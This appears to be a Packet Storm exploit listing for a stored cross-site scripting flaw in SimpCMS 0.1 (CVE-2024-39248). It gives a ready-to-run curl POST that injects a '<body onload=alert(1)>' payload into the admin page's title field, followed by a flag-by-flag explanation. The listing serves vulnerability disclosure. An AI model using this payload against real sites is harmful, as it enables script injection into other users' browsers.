Lucene search
Jason JacobsPACKETSTORM:179219HistoryJun 27, 2024 - 12:00 a.m.
SimpCMS 0.1 Cross Site Scripting
2024-06-2700:00:00
Jason Jacobs
packetstormsecurity.com
60
exploit
simpcms
cross site scripting
cve-2024-39248
web application
curl
post request
xss payload
`# Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)
# Date: 26-06-2024
# CVE: CVE-2024-39248
# Exploit Author: Jason Jacobs (0xjason_jacobs)
# Vendor Homepage: https://sourceforge.net/projects/simpcms/
# Software Link: https://sourceforge.net/projects/simpcms/
# Category: Web Application
# Version: 0.1
# Vulnerable endpoint: /SimpCMS/admin.php
Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explanation:
- curl: The command-line tool for transferring data with URLs.
- -X POST: Specifies the request method to use (POST).
- "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.
- -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit": The POST request payload.
Run this command in your terminal to send the POST request with the XSS payload.
Visit the /SimpCMS main site and the XSS will be visible.
`